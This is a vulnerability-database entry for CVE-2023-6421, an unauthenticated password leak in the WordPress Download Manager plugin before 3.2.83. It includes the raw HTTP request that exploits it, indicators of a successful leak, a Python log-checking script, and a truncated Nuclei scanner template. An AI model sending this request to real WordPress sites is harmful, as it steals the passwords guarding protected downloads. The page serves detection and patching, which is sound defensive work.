CVE-2023-6421
Published 2024-01-01

CVE-2023-6421: The Download Manager WordPress plugin before 3.2.83 does not protect file download's passwords, leaking it upon receiving an invalid one.

Priority: P3 · 53 · high · 7.5 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT
EPSS: 2.44% (82.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| w3eden | download_manager | < 3.2.83 | 3.2.83 |
Detection & IOCs

Command:

```http
POST /index.php?rest_route=/wpdm/validate-password HTTP/1.1
Content-Type: application/x-www-form-urlencoded

__wpdm_ID={{id}}&dataType=json&execute=wpdm_getlink&action=wpdm_ajax_call&password=123322
```

- Detect exploitation attempts by monitoring POST requests to the validate-password REST API endpoint with parameters indicative of the attack payload.
- A successful exploit response will contain both 'Wrong Password' and 'op":"' in the JSON body, leaking the actual password in the '.op' field.
- The response Content-Type will be application/json and HTTP status 200 even when the wrong password is submitted, indicating password leakage.
- The leaked password is extracted from the '.op' JSON field in the server response.
- Identify vulnerable WordPress instances by searching for the download-manager plugin path in page body or URL.
- The vulnerability affects WordPress Download Manager plugin versions before 3.2.83 only.
- The attack requires knowing or brute-forcing a valid password-protected file ID (the '__wpdm_ID' parameter); the PoC template notes to pass the file ID via the 'id' parameter.
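The request and response indicators listed above, combined into one check over logged request/response pairs; this is an added example, not code from the page's sources or from the plugin. It separates a probe of the endpoint from a confirmed leak and never echoes the `op` value. The record field names, the sample bodies and the `/wp-json/` route form are assumptions.

```python
import json
from urllib.parse import urlsplit, parse_qs

ROUTE = "/wpdm/validate-password"

def targets_endpoint(method, url):
    """True for a POST to the validate-password REST route."""
    parts = urlsplit(url)
    # ?rest_route= is the form on the page; /wp-json/ (pretty permalinks) is an assumption.
    route = parse_qs(parts.query).get("rest_route", [""])[0].rstrip("/")
    pretty = parts.path.rstrip("/").endswith("/wp-json" + ROUTE)
    return method.upper() == "POST" and (route == ROUTE or pretty)

def classify(ex):
    """Return 'leak', 'attempt' or None for one request/response record."""
    if not targets_endpoint(ex["method"], ex["url"]):
        return None
    body = ex.get("resp_body", "")
    is_json = "application/json" in ex.get("resp_content_type", "")
    if ex.get("status") == 200 and is_json and "Wrong Password" in body:
        try:
            op = json.loads(body).get("op")
        except (ValueError, AttributeError):
            op = None
        if op:  # error text plus a non-empty .op field: password was disclosed
            return "leak"
    return "attempt"

def summarize(exchanges):
    """Count findings per source address: {src: {'leak': n, 'attempt': m}}."""
    out = {}
    for ex in exchanges:
        kind = classify(ex)
        if kind:
            out.setdefault(ex["src"], {"leak": 0, "attempt": 0})[kind] += 1
    return out

# Constructed records (field names and response bodies are hypothetical).
J = "application/json; charset=UTF-8"
SAMPLE = [
    {"src": "203.0.113.7", "method": "POST", "status": 200, "resp_content_type": J,
     "url": "/index.php?rest_route=/wpdm/validate-password",
     "resp_body": '{"error":"Wrong Password","op":"SAMPLE-VALUE"}'},
    {"src": "203.0.113.7", "method": "POST", "status": 200, "resp_content_type": J,
     "url": "/wp-json/wpdm/validate-password",
     "resp_body": '{"error":"Wrong Password"}'},
    {"src": "198.51.100.4", "method": "GET", "status": 200, "resp_content_type": "text/html",
     "url": "/download/sample-file/", "resp_body": "<html></html>"},
]
```

A `leak` result means the download password for that file should be rotated after upgrading to 3.2.83; many `attempt` results from one source with varying `__wpdm_ID` values point to file ID enumeration.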
No detection rules found.
Nuclei
WordPress Download Manager - File Password Exposure
nuclei·CVSS 7.5
CVE-2023-6421 [HIGH] WordPress Download Manager - File Password Exposure
The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.
Template:

```yaml
id: CVE-2023-6421

info:
  name: WordPress Download Manager - File Password Exposure
  author: ritikchaddha
  severity: medium
  description: |
    The WordPress Download Manager plugin contains a vulnerability that allows attackers to obtain passwords for password-protected downloads by sending a specially crafted request to the validate-password API endpoint.
  impact: |
    Unauthenticated attackers can obtain passwords for password-protected downloads by sending crafted requests to the validate-password API endpoint.
  remediatio
```
No writeups or analysis indexed.